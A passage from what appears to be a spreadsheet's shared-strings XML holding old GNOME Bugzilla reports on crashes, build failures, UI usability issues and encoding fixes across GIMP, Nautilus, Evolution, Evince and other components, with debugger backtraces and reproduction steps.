I realized I will actually need to learn a lot more about bonobo for this so
I doubled the time required.  Parts are done but it's taking me longer because
I've not dealt with bonobo yet.
------- Additional Comments From jirka@5z.com 2000-05-21 03:15:35 ----
Mostly done and since it sort of grew into other tasks I've added those and
I'll mark this fixed
------- Additional Comments From sullivan@eazel.com 2000-09-08 15:30:14 ----
Setting all bugs to P6 to start official bug-prioritization plan. Please don't
set the priority to anything other than P6 unless you've got the gold seal of
approval for doing so.
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-09-09 20:39 -------
Bug blocks bug(s) 40765 40766 40767.
</t>
  </si>
  <si>
    <t>GIMP-137502</t>
  </si>
  <si>
    <t>Configure script should warn about intltool &gt; 0.27.2</t>
  </si>
  <si>
    <t>It seens that versions 0.28 through (at least) 0.30 of intltool sometimes 
give incorrect XML as output. 
I just run in such an issue with intltool 0.30 which broke my Tips file. 
It seens therefore reasonable that people building the GIMP be warned about 
such issues and that the build of XML files could be broken.</t>
  </si>
  <si>
    <t>LIBGNOMEUI-399849</t>
  </si>
  <si>
    <t>crash when typing ~ to location entry widget</t>
  </si>
  <si>
    <t>With libgnomeui 2.17.90:
* open gedit
* click on the open icon
* type '~' to the location entry
The backtrace for the crash:
#0  0xb73b8bdb in strlen () from /lib/tls/i686/cmov/libc.so.6
#1  0xb74d46ae in IA__g_strdup (str=0x1 )
    at gstrfuncs.c:90
#2  0xb56de7dd in gtk_file_system_gnome_vfs_parse (file_system=0x82480a8 
    base_path=0x86a52b8 str=0x86f8e10 ~ folder=0xbfb25908 
    file_part=0xbfb25904 error=0x0) at gtkfilesystemgnomevfs.c:2313
#3  0xb789fa21 in IA__gtk_file_system_parse (file_system=0x82480a8 
    base_path=0x86a52b8 str=0x86f8e10 ~ folder=0xbfb25958 
    file_part=0xbfb25954 error=0x0) at gtkfilesystem.c:810
#4  0xb7893767 in gtk_file_chooser_entry_changed (editable=0x82579e8)
    at gtkfilechooserentry.c:829
#5  0xb75389c9 in IA__g_cclosure_marshal_VOID__VOID (closure=0x81198d8 
    return_value=0x0 n_param_values=1 param_values=0xbfb25bcc 
    invocation_hint=0xbfb25adc marshal_data=0xb78936f0) at gmarshal.c:77
#6  0xb7529eb7 in g_type_iface_meta_marshal (closure=0x81198d8 
    return_value=0x0 n_param_values=1 param_values=0xbfb25bcc 
    invocation_hint=0xbfb25adc marshal_data=0x0) at gclosure.c:590
#7  0xb752b62b in IA__g_closure_invoke (closure=0x81198d8 return_value=0x0 
    n_param_values=1 param_values=0xbfb25bcc invocation_hint=0xbfb25adc)
    at gclosure.c:490
#8  0xb753c743 in signal_emit_unlocked_R (node=0x81198f0 detail=0 
    instance=0x82579e8 emission_return=0x0 instance_and_params=0xbfb25bcc)
    at gsignal.c:2478</t>
  </si>
  <si>
    <t>GNUMERIC-79589</t>
  </si>
  <si>
    <t>Compilation</t>
  </si>
  <si>
    <t>Compiling in a separate builddir fails</t>
  </si>
  <si>
    <t>The generated file gnm-marshalers.h isn't found in the include path.</t>
  </si>
  <si>
    <t>GTKSOURCEVIEW-519233</t>
  </si>
  <si>
    <t>GTKSOURCEVIEW</t>
  </si>
  <si>
    <t>Memory leak in marks draw code</t>
  </si>
  <si>
    <t>Just found that by accident while running anjuta in valgrind</t>
  </si>
  <si>
    <t>gtksourceview-maint</t>
  </si>
  <si>
    <t>EEL-108133</t>
  </si>
  <si>
    <t>Problem compiling tests for eel 2.2.2</t>
  </si>
  <si>
    <t>Hi
I just compiled eel-2.2.2 without problem
but for the make check i got this error :
# gmake check
Making check in eel
gmake[1]: Entering directory `/tmp/eel-2.2.2/eel'
gmake  check-TESTS
gmake[2]: Entering directory `/tmp/eel-2.2.2/eel'
running eel_self_check_art_extensions
running eel_self_check_background
running eel_self_check_enumeration
running eel_self_check_gdk_extensions
running eel_self_check_gdk_pixbuf_extensions
running eel_self_check_glib_extensions
running eel_self_check_pango_extensions
running eel_self_check_preferences
running eel_self_check_string
running eel_self_check_string_list
running eel_self_check_vfs_extensions
FAIL: check failed in eel-vfs-extensions.c line 1870
      evaluated: eel_make_uri_canonical (file:)
       expected: file:///
            got: file:
FAIL: check failed in eel-vfs-extensions.c line 1872
      evaluated: eel_make_uri_canonical (glorp:)
       expected: glorp:///
            got: glorp:
FAIL: check failed in eel-vfs-extensions.c line 1928
      evaluated: eel_format_uri_for_display (:)
       expected: :///
            got: :
FAIL: check-eel
===================
1 of 1 tests failed
===================
gmake[2]: *** [check-TESTS] Error 1
gmake[2]: Leaving directory `/tmp/eel-2.2.2/eel'
gmake[1]: *** [check-am] Error 2
gmake[1]: Leaving directory `/tmp/eel-2.2.2/eel'
gmake: *** [check-recursive] Error 1
It is maybe not very important but I wanted to report it.
Best regards
Pierre.</t>
  </si>
  <si>
    <t>pierre42</t>
  </si>
  <si>
    <t>ATK-125725</t>
  </si>
  <si>
    <t>Leaks associated with AtkRelation</t>
  </si>
  <si>
    <t>Should atk_relation_set_property clear out -&gt;target before it assigns a new
value?</t>
  </si>
  <si>
    <t>DIA-340352</t>
  </si>
  <si>
    <t>use GtkAction framework</t>
  </si>
  <si>
    <t>Bug to track moving away from the deprecated GtkItemFactory towards the GtkUIManager/GtkAction framework.</t>
  </si>
  <si>
    <t>GNOME-UTILS-76685</t>
  </si>
  <si>
    <t>Usability/HIG compliance suggestions (logview)</t>
  </si>
  <si>
    <t>- Application really ought to have a different icon current one is a
visual pun that will not localize well.
- App pops up  a /var/log/messages is not a regular file error
every time I run it but doesn't explain why this is a problem or what I
should do about it.  (Not being a sysadmin type I'm still none the wiser!)
- Uses a non-standard list control/font  to display the system log-- should
really use a regular gtktreeview widget / themed font for accessibility
reasons in particular etc.
- Couldn't find a way to change the colour/font used for the log file date
header-- again this would be an accessibility problem
- Suggested menu restructure to follow HIG guidelines more closely:
_Log
 _Open       Ctrl+O
 Save _As...  Shift+Ctrl+S
 ---
 S_witch Log
 _Monitor...
 ---
 _Properties   Ctrl+I   (was View-&gt;Log Stats)
 ---
 _Close        Alt+F4
 _Quit          Ctrl+Q
_Edit
 _Preferences
_View
 [x]  _Calendar  Ctrl+L
 [x] _Entry Detail  Ctrl+D
_Help
 _Contents    F1
 _About System Log Viewer
- Preferences dialog:  with only one control in it the notebook tab is
probably overkill.  Would be good if it was an instant-apply dialog then
Apply and OK buttons could be removed.  The text label for the spinbox
needs a mnemonic.
- Monitor dialog:  IMHO this should probably be another tab in the
Preferences dialog.  All the controls here need mnemonics.  Buttons
should be on a row of their own along the bottom not mixed in with
checkboxes.  Hide App and Exec Actions should be relabelled with full
words i.e. Hide Application etc.  Buttons should be in order
Actions-Cancel-OK aligned with right edge of dialog and should all be
same width.
- Monitor Options-&gt;Actions... dialog: title should be Edit Actions. 
Cancel+OK buttons should be same width.  All controls need mnemonics. 
Edit/Remove buttons should be disabled unless something is selected in the
tree.
- Monitor Options-&gt;Add-&gt;Add/Edit dialog.  Cancel+OK buttons should be
regular button height.  All controls need mnemonics.  All labels need to
start with a capital letter and should be left-aligned not centred.</t>
  </si>
  <si>
    <t>METACITY-90738</t>
  </si>
  <si>
    <t>On xinerama systems metacity popups appear across both displays</t>
  </si>
  <si>
    <t>Metacity popups such as the alt-tab window list and the workspace switcher
on keypress dialog appear centered in a Xinerama-oblivious fashion.
Could they appear centered on the head with the mouse?
-Rob</t>
  </si>
  <si>
    <t>GNOME-CORE-51943</t>
  </si>
  <si>
    <t>panel crashing</t>
  </si>
  <si>
    <t xml:space="preserve">Package:  panel
Severity: grave
Version:  1.2.4
Synopsis: panel crashing
Class:    sw-bug
Distribution: Debian testing/unstable
System: Linux 2.2.18pre21 i686 unknown
C library: C library 2.2.2-1
C compiler: 2.95.3
glib: 1.2.8
GTK+: 1.2.8
ORBit: ORBit 0.5.7
gnome-libs: gnome-libs 1.2.12
libxml: 1.8.11
gnome-print: gnome-print-0.25
gnome-core: gnome-core 1.2.4
Description:
   Every time I open licq the Gnome panel crashes due to a segmentation
fault.  I am using the gnome_gui for licq and the main licq dialogue
cannot be opened without the panel crashing.
Gdk-ERROR **: BadWindow (invalid Window parameter) serial 7274
error_code 3 request_code 2 minor_code 0
Gdk-ERROR **: BadWindow (invalid Window paramter) serial 7275 error_code
3 request_code 18 minor_code 0
Debugging information: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0x40612199 in wait4 () from /lib/libc.so.6
#0  0x40612199 in wait4 () from /lib/libc.so.6
#1  0x40679bf4 in __check_rhosts_file () from /lib/libc.so.6
#2  0x4014c2c6 in gnome_init () from /usr/lib/libgnomeui.so.32
#3  0x4059c288 in sigaction () from /lib/libc.so.6
#4  0x807a1b0 in load_queued_externs ()
#5  0x4002c429 in _ORBIT_skel_GNOME_PanelSpot_register_us ()
   from /usr/lib/libpanel_applet.so.0
#6  0x4006dd69 in ORBit_POA_handle_request () from /usr/lib/libORBit.so.0
#7  0x40070f6f in CORBA_ORB_run () from /usr/lib/libORBit.so.0
#8  0x400712b4 in CORBA_ORB_run () from /usr/lib/libORBit.so.0
#9  0x400894b4 in giop_main_handle_connection () from /usr/lib/libIIOP.so.0
#10 0x400db3f0 in goad_register_arguments () from /usr/lib/libgnorba.so.27
#11 0x4009ebf0 in g_io_add_watch () from /usr/lib/libglib-1.2.so.0
#12 0x400a02b9 in g_get_current_time () from /usr/lib/libglib-1.2.so.0
#13 0x400a08c3 in g_get_current_time () from /usr/lib/libglib-1.2.so.0
#14 0x400a0a5c in g_main_run () from /usr/lib/libglib-1.2.so.0
#15 0x40298457 in gtk_main () from /usr/lib/libgtk-1.2.so.0
#16 0x805600a in main ()
#17 0x4058cf5c in __libc_start_main () from /lib/libc.so.6
#0  0x40612199 in wait4 () from /lib/libc.so.6
No symbol table info available.
#1  0x40679bf4 in __check_rhosts_file () from /lib/libc.so.6
No symbol table info available.
#2  0x4014c2c6 in gnome_init () from /usr/lib/libgnomeui.so.32
No symbol table info available.
#3  0x4059c288 in sigaction () from /lib/libc.so.6
No symbol table info available.
#4  0x807a1b0 in load_queued_externs ()
No symbol table info available.
#5  0x4002c429 in _ORBIT_skel_GNOME_PanelSpot_register_us ()
   from /usr/lib/libpanel_applet.so.0
No symbol table info available.
#6  0x4006dd69 in ORBit_POA_handle_request () from /usr/lib/libORBit.so.0
No symbol table info available.
#7  0x40070f6f in CORBA_ORB_run () from /usr/lib/libORBit.so.0
No symbol table info available.
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-03-09 19:06 -------
The original reporter (d_black_blade@hotmail.com) of this bug does not have an account here.
Reassigning to the exporter unknown@bugzilla.gnome.org.
Reassigning to the default owner of the component panel-maint@bugzilla.gnome.org.
</t>
  </si>
  <si>
    <t>d_black_blade</t>
  </si>
  <si>
    <t>NAUTILUS-313588</t>
  </si>
  <si>
    <t>Nautilus caused entire desktop to lock up</t>
  </si>
  <si>
    <t>1.  Right click on desktop.
2.  Select Create Document -&gt; Empty File.
3.  Middle click drag and release the new file on the desktop.
The entire desktop locks up.</t>
  </si>
  <si>
    <t>SEAHORSE-447450</t>
  </si>
  <si>
    <t>Opening properties of ssh key</t>
  </si>
  <si>
    <t>What were you doing when the application crashed?
Opening properties of my ssh key.
Distribution: Unknown
Gnome Release: 2.16.3 2007-02-14 (GNOME.Org)
BugBuddy Version: 2.16.1
System: Linux 2.6.21.3 #2 SMP Thu Jun 7 19:06:47 CEST 2007 i686
X Vendor: The X.Org Foundation
X Vendor Release: 70100000
Selinux: No
Accessibility: Disabled
Memory status: size: 41213952 vsize: 0 resident: 41213952 share: 0 rss: 15454208 rss_rlim: 0
CPU usage: start_time: 1181813780 rtime: 0 utime: 119 stime: 0 cutime:115 cstime: 0 timeout: 4 it_real_value: 0 frequency: 0
Backtrace was generated from '/usr/bin/seahorse'
Using host libthread_db library /lib/libthread_db.so.1.
[Thread debugging using libthread_db enabled]
[New Thread -1227385168 (LWP 8543)]
0xb7f15410 in __kernel_vsyscall ()
#0  0xb7f15410 in __kernel_vsyscall ()
#1  0xb792d573 in __waitpid_nocancel () from /lib/libpthread.so.0
#2  0xb7ebd758 in libgnomeui_segv_handle () from /usr/lib/libgnomeui-2.so.0
#3  0x081234e8 in ?? ()
#4  0x00000001 in ?? ()
#5  0xb75fb459 in gtk_widget_region_intersect ()
   from /usr/lib/libgtk-x11-2.0.so.0
#6  0xb735a104 in gdk_rectangle_union () from /usr/lib/libgdk-x11-2.0.so.0
#7  0x08388a24 in ?? ()
Thread 1 (Thread -1227385168 (LWP 8543)):
#0  0xb7f15410 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb792d573 in __waitpid_nocancel () from /lib/libpthread.so.0
No symbol table info available.
#2  0xb7ebd758 in libgnomeui_segv_handle () from /usr/lib/libgnomeui-2.so.0
No symbol table info available.
#3  0x081234e8 in ?? ()
No symbol table info available.
#4  0x00000001 in ?? ()
No symbol table info available.
#5  0xb75fb459 in gtk_widget_region_intersect ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#6  0xb735a104 in gdk_rectangle_union () from /usr/lib/libgdk-x11-2.0.so.0
No symbol table info available.
#7  0x08388a24 in ?? ()
No symbol table info available.
#0  0xb7f15410 in __kernel_vsyscall ()
----------- .xsession-errors ---------------------
ERROR: metadata App:Icon not found
ERROR: metadata App:Name not found
ERROR: metadata App:Exec not found
can't lock memory: Cannot allocate memoryWARNING: not using secure memory for passwords
** Message: init gpgme version 1.0.3
** (bug-buddy:8552): WARNING **: Couldn't load icon for Bonobo Component Browser
** (bug-buddy:8552): WARNING **: Couldn't load icon for Decrypt File
** (bug-buddy:8552): WARNING **: Couldn't load icon for Import Key
** (bug-buddy:8552): WARNING **: Couldn't load icon for Open Folder
** (bug-buddy:8552): WARNING **: Couldn't load icon for Verify Signature
--------------------------------------------------</t>
  </si>
  <si>
    <t>nulleke</t>
  </si>
  <si>
    <t>GNOME-PRINT-107832</t>
  </si>
  <si>
    <t>Envelope No 10 is duplicated in Paper size selecter in Print dialog</t>
  </si>
  <si>
    <t>Reproduction:
1. Invoke gedit
2. Click File -&gt; Print
3. Click Paper tab in Print dialog
4. Open the selecter of Paper size
Two Envelope No 10 entries are found at the bottom of the list.</t>
  </si>
  <si>
    <t>GNOMEICU-118951</t>
  </si>
  <si>
    <t>Message dialogs</t>
  </si>
  <si>
    <t>icqimages doesnt work</t>
  </si>
  <si>
    <t>Hi guys
i had found an little bug if i chat with my girlfriend
she had windows and wen she is sending me little pictures (by icq you can 
select them by icqpro /icqlite) i only see 
but dont the picture
i hope i helped you....</t>
  </si>
  <si>
    <t>masterofdis</t>
  </si>
  <si>
    <t>GTKHTML-200783</t>
  </si>
  <si>
    <t>table misrendered</t>
  </si>
  <si>
    <t xml:space="preserve"> start gtkhtml
 the testgtkhtml thing
 type tigert.gimp.org on the irl
 url
 click the gimp link (the pencil)
 then click back
 do you get the table messed up?</t>
  </si>
  <si>
    <t>GEDIT-107491</t>
  </si>
  <si>
    <t>ISO2022JR and ISO2022KR should be canonical names</t>
  </si>
  <si>
    <t>Canonical names are ISO-2022-JP and ISO-2022-KR as are defined
in RFC1468.txt and RFC1557 so gedit/gedit/gedit-encodings.c
should be changed:
Index: gedit-encodings.c
===================================================================
RCS file: /cvs/gnome/gedit/gedit/gedit-encodings.cv
retrieving revision 1.7
diff -u -p -r1.7 gedit-encodings.c
--- gedit-encodings.c   22 Feb 2003 19:25:38 -0000      1.7
+++ gedit-encodings.c   3 Mar 2003 19:36:03 -0000
@@ -2249 +2249 @@ static GeditEncoding encodings [] = {
     IBM864 N_(Arabic) }
   { GEDIT_ENCODING_ISO_2022_JP
-    ISO2022JP N_(Japanese) }
+    ISO-2022-JP N_(Japanese) }
   { GEDIT_ENCODING_ISO_2022_KR
-    ISO2022KR N_(Korean) }
+    ISO-2022-KR N_(Korean) }
   { GEDIT_ENCODING_ISO_IR_111
     ISO-IR-111 N_(Cyrillic) }
   { GEDIT_ENCODING_JOHAB
or iso-2022-jp/iso-2022-kr text-files are not handled with
Solaris native iconv library.
GNU iconv supports both ISO2022JP/ISO-2022-JP and ISO2022KR/ISO-2022-JP so
changing won't be a harm with the GNU
iconv.</t>
  </si>
  <si>
    <t>EVINCE-385170</t>
  </si>
  <si>
    <t>print copies # is ignored</t>
  </si>
  <si>
    <t>Please describe the problem:
I was just trying to print 3 copies each of two different PDFs and when I got to the printer it only printed one copy of each. Going back to the print dialog shows that I definitely selected to print 3 in both cases. Where did my other two/four copies go?
I've also had it print all the copies and staple them together on occasion but not this time.
I'm using Ubuntu Edgy with all the latest updates. Version info:
evince: 0.6.1-0ubuntu1.2
cupsys: 1.2.4-2ubuntu3
hplip: 1.6.9-0ubuntu2
printer is an HP LaserJet 9000 MFP with stappler (used) all 4 trays etc.
driver: HP LaserJet 9000 MFP Postscript (recommended) (not hplip apparently)
Are other models/brands of printers affected? Maybe it's just something screwy with my cups config. If so then I can re-report bug error to them. Any idea who is the culprit here?
Steps to reproduce:
Actual results:
Expected results:
Does this happen every time?
Other information:</t>
  </si>
  <si>
    <t>GLADE-347576</t>
  </si>
  <si>
    <t>It deletes my dialog from glade file!</t>
  </si>
  <si>
    <t>Steps to reproduce:
1) Open attached glade file (according to hg log it was created on Jun 17 and I have had CVS glade from about that time).
2) Hit Save.
3) Close and reopen it.
Result: the dialog has disappeared!</t>
  </si>
  <si>
    <t>GTKHTML-233972</t>
  </si>
  <si>
    <t>Cannot compose mail using remote X connection</t>
  </si>
  <si>
    <t>I often use Cygwin XFree86 to access Evolution
remotely.  Previous versions of Evolution have
worked perfectly (albeit slowly).  However
compose (or reply to) mail in Evolution 1.2 does
not work.  It displays the compose window and
allows the headers 'To:' 'Subject:' to be filled
in but does not display the text entry pane for
typing in the message.  It works perfectly when
running using the local X server on my Linux box.
I have not been able to test using another X
server other than Cygwin XFree86.
Ian
---</t>
  </si>
  <si>
    <t>ian.foot</t>
  </si>
  <si>
    <t>BANSHEE-340313</t>
  </si>
  <si>
    <t>iPod fails to appear in source list if Banshee is already started</t>
  </si>
  <si>
    <t>If you plug in your iPod before starting Banshee it still works correctly but if you plug it in afterward it will appear as a mass storage device allowing the user to drop files onto it that they won't be able to play since the iPod is not just a simple mass storage device.
This is fixed in CVS HEAD but not yet in the stable branch.</t>
  </si>
  <si>
    <t>GLADE-LEGACY-156350</t>
  </si>
  <si>
    <t>comments and translatable properties not writing to file</t>
  </si>
  <si>
    <t>Hello
I just installed glade 2.6.5 and now all my translatable and comments properties
from the glade XML file are gone! It's as though glade is not writing out the
contents of these fields any more.
Why has support for these been taken out?
Thanks
Neil</t>
  </si>
  <si>
    <t>nzanella</t>
  </si>
  <si>
    <t>TOMBOY-409939</t>
  </si>
  <si>
    <t>Default font should be Gnome document font</t>
  </si>
  <si>
    <t>The default font should be the desktop-wide document font not the default Pango uses.</t>
  </si>
  <si>
    <t>NAUTILUS-78120</t>
  </si>
  <si>
    <t>desktop ignores alternative keybindings specified in the file-manager xml for delete</t>
  </si>
  <si>
    <t>trying to delete a file on the desktop with the delete key doesn't work.
I'm pretty sure it did in 1.06. also it does work when browsing files in
the icon view.</t>
  </si>
  <si>
    <t>BUGZILLA.GNOME.ORG-52338</t>
  </si>
  <si>
    <t>Addressbook crashes when I try to edit a LDAP addressbook</t>
  </si>
  <si>
    <t xml:space="preserve">Package: bugzilla.gnome.org
Severity: normal
Version: 0.0
Synopsis: Addressbook crashes when I try to edit a LDAP addressbook
Bugzilla-Product: bugzilla.gnome.org
Bugzilla-Component: email
Description:
When I try to edit an existing LDAP addressbook (Yahoo for ex)
it crashes. Also it does not let me add addressbooks the OK button is
greyed out.
Debugging Information:
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
[New Thread 1024 (LWP 4711)]
0x408f7869 in __wait4 () from /lib/libc.so.6
#0  0x408f7869 in __wait4 () from /lib/libc.so.6
#1  0x409631c8 in __DTOR_END__ () from /lib/libc.so.6
#2  0x4067d70a in waitpid (pid=4754 stat_loc=0xbfffe8d8 options=0)
    at wrapsyscall.c:174
#3  0x4055423a in gnome_segv_handle (signum=11) at gnome-init.c:660
#4  0x4067b329 in pthread_sighandler (signo=11 ctx={gs = 0 __gsh = 0 
      fs = 0 __fsh = 0 es = 43 __esh = 0 ds = 43 __dsh = 0 
      edi = 135452336 esi = 0 ebp = 3221219992 esp = 3221219956 
      ebx = 135421448 edx = 4294967295 ecx = 134871452 eax = 1 
      trapno = 14 err = 4 eip = 134596152 cs = 35 __csh = 0 
      eflags = 2163270 esp_at_signal = 3221219956 ss = 43 __ssh = 0 
      fpstate = 0xbfffe9f8 oldmask = 2147549184 cr2 = 12}) at signals.c:97
#5  
#6  0x805c638 in addressbook_component_factory_init ()
#7  0x805ce39 in addressbook_component_factory_init ()
#8  0x805ce9e in addressbook_component_factory_init ()
#9  0x805cfec in addressbook_component_factory_init ()
#10 0x401569e3 in gtk_marshal_NONE__NONE () from /usr/lib/libgtk-1.2.so.0
#11 0x40188d4a in gtk_handlers_run () from /usr/lib/libgtk-1.2.so.0
#12 0x4018808d in gtk_signal_real_emit () from /usr/lib/libgtk-1.2.so.0
#13 0x40185e35 in gtk_signal_emit () from /usr/lib/libgtk-1.2.so.0
#14 0x400ee98d in gtk_button_clicked () from /usr/lib/libgtk-1.2.so.0
#15 0x400f01ed in gtk_real_button_released () from /usr/lib/libgtk-1.2.so.0
#16 0x401569e3 in gtk_marshal_NONE__NONE () from /usr/lib/libgtk-1.2.so.0
#17 0x40187f18 in gtk_signal_real_emit () from /usr/lib/libgtk-1.2.so.0
#18 0x40185e35 in gtk_signal_emit () from /usr/lib/libgtk-1.2.so.0
#19 0x400ee8bd in gtk_button_released () from /usr/lib/libgtk-1.2.so.0
#20 0x400efad7 in gtk_button_button_release () from /usr/lib/libgtk-1.2.so.0
#21 0x401566ae in gtk_marshal_BOOL__POINTER () from /usr/lib/libgtk-1.2.so.0
#22 0x401880cc in gtk_signal_real_emit () from /usr/lib/libgtk-1.2.so.0
#23 0x40185e35 in gtk_signal_emit () from /usr/lib/libgtk-1.2.so.0
#24 0x401c0229 in gtk_widget_event () from /usr/lib/libgtk-1.2.so.0
#25 0x40156625 in gtk_propagate_event () from /usr/lib/libgtk-1.2.so.0
#26 0x401556ef in gtk_main_do_event () from /usr/lib/libgtk-1.2.so.0
#27 0x4020ac21 in gdk_event_dispatch () from /usr/lib/libgdk-1.2.so.0
#28 0x4023d987 in g_main_dispatch () from /usr/lib/libglib-1.2.so.0
#29 0x4023e001 in g_main_iterate () from /usr/lib/libglib-1.2.so.0
#30 0x4023e1cc in g_main_run () from /usr/lib/libglib-1.2.so.0
#31 0x40154f87 in gtk_main () from /usr/lib/libgtk-1.2.so.0
#32 0x406cc1ab in bonobo_main () at bonobo-main.c:275
#33 0x805d579 in main ()
#34 0x40862b5c in __libc_start_main (main=0x805d518  argc=3 
    ubp_av=0xbffff824 init=0x8058c48  fini=0x808aa4c  
    rtld_fini=0x4000d634  stack_end=0xbffff81c)
    at ../sysdeps/generic/libc-start.c:129
#0  0x408f7869 in __wait4 () from /lib/libc.so.6
No locals.
#1  0x409631c8 in __DTOR_END__ () from /lib/libc.so.6
No symbol table info available.
#2  0x4067d70a in waitpid (pid=4754 stat_loc=0xbfffe8d8 options=0)
    at wrapsyscall.c:174
stat_loc = (int *) 0xbfffe8d8
options = 0
result = 0
oldtype = 0
#3  0x4055423a in gnome_segv_handle (signum=11) at gnome-init.c:660
in_segv.5 = 1
pid = 0
estatus = 135232688
buf = ^o#@`&gt;\017\b0w#@0|\017\bl\000%@0|\017\bxU\n\b(i?
#4  0x4067b329 in pthread_sighandler (signo=11 ctx={gs = 0 __gsh = 0 
      fs = 0 __fsh = 0 es = 43 __esh = 0 ds = 43 __dsh = 0 
      edi = 135452336 esi = 0 ebp = 3221219992 esp = 3221219956 
      ebx = 135421448 edx = 4294967295 ecx = 134871452 eax = 1 
      trapno = 14 err = 4 eip = 134596152 cs = 35 __csh = 0 
      eflags = 2163270 esp_at_signal = 3221219956 ss = 43 __ssh = 0 
      fpstate = 0xbfffe9f8 oldmask = 2147549184 cr2 = 12}) at signals.c:97
self = 0x40684280
in_sighandler = 0x0
self = 0x40684280
in_sighandler = 0x0
#5  
No locals.
#6  0x805c638 in addressbook_component_factory_init ()
No symbol table info available.
#7  0x805ce39 in addressbook_component_factory_init ()
No symbol table info available.
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-03-20 19:02 -------
The original reporter (mjaganna@us.oracle.com) of this bug does not have an account here.
Reassigning to the exporter unknown@bugzilla.gnome.org.
Reassigning to the default owner of the component baulig@suse.de.
</t>
  </si>
  <si>
    <t>mjaganna</t>
  </si>
  <si>
    <t>EVOLUTION-243356</t>
  </si>
  <si>
    <t>One appointment pops up 4 alarm dialog at the same time.</t>
  </si>
  <si>
    <t>Description of Problem:
One appointment pops up 4 alarm dialog at the same time.
Prerequisites:
Locale is ZH
Steps to reproduce the problem:
1. Start evolution and go to calendar component.
2. New an appointment and set reminder: display a message 15 minutes before
the appointment start.
3. Wait until 15 minutes before the appointment start.
Actual Results:
There pops up 4 alarm dialogs for one appointment two for English two for
Chinese.
Expected Results:
There should be one alarm dialog.
How often does this happen? 
always
Additional Information:
See attachment for more information</t>
  </si>
  <si>
    <t>EOG-486057</t>
  </si>
  <si>
    <t>SetAsWallpaper functionality doesn't launch background properties</t>
  </si>
  <si>
    <t>The summary mostly says it all.
Usually when clicking on Set as Wallpaper the background properties dialog showed up. This allowed the user to select further background options.
I guess this is because of the merger of the background dialog into the appearance capplet.</t>
  </si>
  <si>
    <t>GNOME-CHESS-60245</t>
  </si>
  <si>
    <t>gnome chess</t>
  </si>
  <si>
    <t xml:space="preserve">Package: gnome-games
Severity: normal
Version: 0.2.4
Synopsis: gnome chess
Bugzilla-Product: gnome-games
Bugzilla-Component: general
Description:
i started it... made a few moves then closed it by use the X on the top right. 
then it crashed
Debugging Information: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0x405681d9 in wait4 () from /lib/libc.so.6
#0  0x405681d9 in wait4 () from /lib/libc.so.6
#1  0x405d7f2c in __check_rhosts_file () from /lib/libc.so.6
#2  0x40097ce9 in gnome_init () from /usr/lib/libgnomeui.so.32
#3  0x20202020 in ?? ()
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-09-09 04:55 -------
The original reporter (hot_arow@localhost.localdomain) of this bug does not have an account here.
Reassigning to the exporter unknown@bugzilla.gnome.org.
Reassigning to the default owner of the component gnome-games-maint@bugzilla.gnome.org.
</t>
  </si>
  <si>
    <t>hot_arow</t>
  </si>
  <si>
    <t>GALEON-133996</t>
  </si>
  <si>
    <t>galeon (briefly) reopens a window if you close it while loading a page</t>
  </si>
  <si>
    <t>I'm sorry if this is a dupe.  I had a hard time thinking up keywords that
another person may have filed this under.
(1) Click on a link open a new window hit 'reload' or anything that
causes a page to start loading.
(2) Quickly close the galeon window that the loading is taking place in.
(3) When the page is done loading the window re-opens and flashes on the
screen for 1/4 of a second or so before closing again.</t>
  </si>
  <si>
    <t>NAUTILUS-416380</t>
  </si>
  <si>
    <t>when uploading to FTP nautilus sometimes suddenly stops the upload</t>
  </si>
  <si>
    <t>Please describe the problem:
This happened to me more than once when I uploaded a lot of files/directories (a WordPress and a Gallery2 installation) to an FTP server with Nautilus. I only use one FTP server however and I've only experienced the problem when uploading to that server.
When I do the upload it can take a few minutes. After the upload goes on for a few minutes Nautilus sometimes suddenly stops the upload. I didn't notice the problem at first I thought the uploading had finished and proceded to the installation page of my WordPress installation which I just uploaded. The installer page mentioned that some files where missing which led me to Nautilus as the cause of the problem. I solved this by uploading all the files (replacing the files of the incomplete upload) again after that was done the upload was apparantly done correctly because the installation page of WordPress no longer complained about missing files.
During another moment when I was uploading something large (Gallery2 installation this time) I also got some error messages during uploading I do not exactly recall the nature of the error messages as this happened a few months ago but they told that a file could not be uploaded and gave me the options Skip Retry or Cancel. I got multiple of those messages and for all of them I chose Retry. That seemed to work and the upload apparantly finished correctly. But when I proceded with installing Gallery on my web server I figured out after a long time (I suspected Gallery2 itself was doing something wrong after I received all kinds of error messages during the installation) that in this case as well certain files/directories which were supposed to be uploaded were in fact not uploaded.
Steps to reproduce:
1. Connect to FTP server (if necessary I'm prepared to give out the username and password of my FTP server to the Nautilus dev who wants to investigate this).
2. Try to upload something which is large with a lot of directories and files.
3. See the upload progressing for a few minutes and after a few minutes possibly suddenly terminate.
Actual results:
Not all files/directories which I wanted to upload are really uploaded because the upload might suddenly stop. When the upload stops Nautilus gives no message that something went wrong. Because no error message is given I assumed more than once that the upload simply completed (faster than expected) correctly.
Expected results:
Ideally Nautilus should upload correctly.
Second Nautilus should verify that everything which the user commanded to be uploaded be really uploaded. It should compare the files/directories which were going to be uploaded with the files/directories which are really on the web server after the upload finishes/suddenly stops. If Nautilus figures out that something went wrong it should give and error message and tell the user so.
Does this happen every time?
Not sure if it happens every time but it does happen very often in case I'm uploading something large.
Other information:</t>
  </si>
  <si>
    <t>a.vanloon</t>
  </si>
  <si>
    <t>EVINCE-314526</t>
  </si>
  <si>
    <t>X Window System error while selecting text in a complex document</t>
  </si>
  <si>
    <t>1) Load this PDF up: http://manic.desrt.ca/fcc
2) Have select-by-text mode enabled.
3) Click the mouse down somewhere in the middle of the pdf.
4) Drag it about for a while.
The program 'evince' received an X Window System error.
This probably reflects a bug in the program.
The error was 'BadMatch (invalid parameter attributes)'.
  (Details: serial 21903 error_code 8 request_code 59 minor_code 0)
  (Note to programmers: normally X errors are reported asynchronously
   that is you will receive the error a while after causing it.
   To debug your program run it with the --sync command line
   option to change this behavior. You can then get a meaningful
   backtrace from your debugger if you break on the gdk_x_error() function.)</t>
  </si>
  <si>
    <t>EVOLUTION-DATA-SERVER-441497</t>
  </si>
